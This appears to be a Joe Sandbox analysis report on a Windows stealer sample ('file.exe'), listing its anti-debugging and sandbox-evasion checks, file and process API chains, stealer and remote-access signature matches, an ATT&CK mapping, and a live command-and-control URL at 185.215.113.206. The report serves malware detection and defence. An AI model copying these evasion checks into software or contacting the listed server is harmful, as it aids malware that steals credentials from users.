                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4EAC7 second address: F4EAD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4EAD5 second address: F4EAD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4EAD9 second address: F4EAFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007FAB30C06334h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4CBD4 second address: F4CBD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4CBD8 second address: F4CBE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a jg 00007FAB30C06326h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4CBE8 second address: F4CC10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30D3D452h 0x00000007 jmp 00007FAB30D3D44Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007FAB30D3D446h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4CC10 second address: F4CC14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4CD8A second address: F4CDA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAB30D3D456h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4CDA7 second address: F4CDAC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4D05D second address: F4D061 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4D061 second address: F4D06B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4D06B second address: F4D07B instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAB30D3D446h 0x00000008 jnl 00007FAB30D3D446h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4D07B second address: F4D080 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4D87B second address: F4D87F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4DA52 second address: F4DA58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4E20E second address: F4E215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4E215 second address: F4E244 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C0632Ch 0x00000007 jmp 00007FAB30C0632Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007FAB30C0632Eh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4E244 second address: F4E249 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4E249 second address: F4E24F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4C778 second address: F4C796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FAB30D3D456h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F553A0 second address: F553A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F54F3B second address: F54F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F54F42 second address: F54F6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FAB30C06337h 0x0000000b popad 0x0000000c pop ebx 0x0000000d jl 00007FAB30C06332h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F550D6 second address: F550F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAB30D3D453h 0x00000009 jnp 00007FAB30D3D446h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F550F3 second address: F55104 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jno 00007FAB30C06326h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F62403 second address: F6240D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FAB30D3D44Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F62529 second address: F62536 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAB30C06328h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F652B0 second address: F652B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F652B4 second address: F652C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FAB30C0632Ch 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F73BA3 second address: F73BAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F73BAE second address: F73BC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAB30C06332h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: D1DAE2 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: D1DB36 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: ECBEBA instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision (graph_0-38353)
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A440F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00A440F0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_00A3E530
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00A3F7B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A447C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00A447C0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A31710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00A31710
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_00A3DB80
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A43B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_00A43B00
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A44B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00A44B60
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_00A3EE20
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_00A3BE40
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00A3DF10
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A31160 GetSystemInfo,ExitProcess | 0_2_00A31160
                Source: file.exe, file.exe, 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1283384849.00000000012FE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1283384849.0000000001375000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1283384849.0000000001344000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWh
                Source: file.exe, 00000000.00000002.1283384849.0000000001375000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW~
                Source: file.exe, 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-37169)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-37166)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-37188)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-37180)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-37220)
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-37053)
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A34610 VirtualProtect ?,00000004,00000100,00000000 | 0_2_00A34610
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A49BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00A49BB0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A49AA0 mov eax, dword ptr fs:[00000030h] | 0_2_00A49AA0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A47690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA | 0_2_00A47690
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 5960, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A49790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_00A49790
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A498E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle | 0_2_00A498E0
                Source: file.exe, file.exe, 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A775A8 cpuid | 0_2_00A775A8
                Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree | 0_2_00A47D20
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A46BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess | 0_2_00A46BC0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A479E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_00A479E0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A47BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA | 0_2_00A47BC0

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.file.exe.a30000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1239089821.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1283384849.00000000012FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 5960, type: MEMORYSTR
                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 0.2.file.exe.a30000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1239089821.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1283384849.00000000012FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 5960, type: MEMORYSTR
                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP
                MITRE ATT&CK Matrix (techniques listed per tactic column; the number in parentheses is the count the report attaches to that technique)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                Execution: Command and Scripting Interpreter (2); Native API (12); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (33); Disable or Modify Tools (11); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
                Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                Discovery: System Time Discovery (2); Security Software Discovery (641); Virtualization/Sandbox Evasion (33); Process Discovery (13); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (1); System Information Discovery (334)
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                Command and Control: Encrypted Channel (2); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Source | Detection | Scanner | Label | Link
file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
file.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label | Link
https://docs.rs/getrandom#nodejs-es-module-support | 0% | URL Reputation | safe |
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/6c4adf523b719729.php | true | | unknown
http://185.215.113.206/ | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/6c4adf523b719729.phpQD | file.exe, 00000000.00000002.1283384849.0000000001344000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206 | file.exe, 00000000.00000002.1283384849.00000000012FE000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.206/6c4adf523b719729.phpID | file.exe, 00000000.00000002.1283384849.0000000001344000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.phpJ | file.exe, 00000000.00000002.1283384849.0000000001359000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.phpft | file.exe, 00000000.00000002.1283384849.00000000012FE000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.php// | file.exe, 00000000.00000002.1283384849.0000000001359000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.phpLMEM | file.exe, 00000000.00000002.1283384849.0000000001359000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/sonation | file.exe, 00000000.00000002.1283384849.0000000001359000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://docs.rs/getrandom#nodejs-es-module-support | file.exe, file.exe, 00000000.00000003.1239089821.0000000004E3B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1546617
                                    Start date and time:2024-11-01 08:51:10 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 5m 1s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:15
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:file.exe
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@1/0@0/1
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 80%
                                    • Number of executed functions: 19
                                    • Number of non-executed functions: 127
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                    • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • VT rate limit hit for: file.exe
                                    No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
185.215.113.206 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206/6c4adf523b719729.php
185.215.113.206 | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
                                    No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar | Browse | 185.215.113.17
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | Browse | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206
                                    No context
                                    No context
                                    No created / dropped files found
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.9617836672005975
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:file.exe
                                    File size:2'159'616 bytes
                                    MD5:caff2fe6c91944cca73634bb9b591335
                                    SHA1:f449657c2b9733b3cd2b90b7320097902f9a94c9
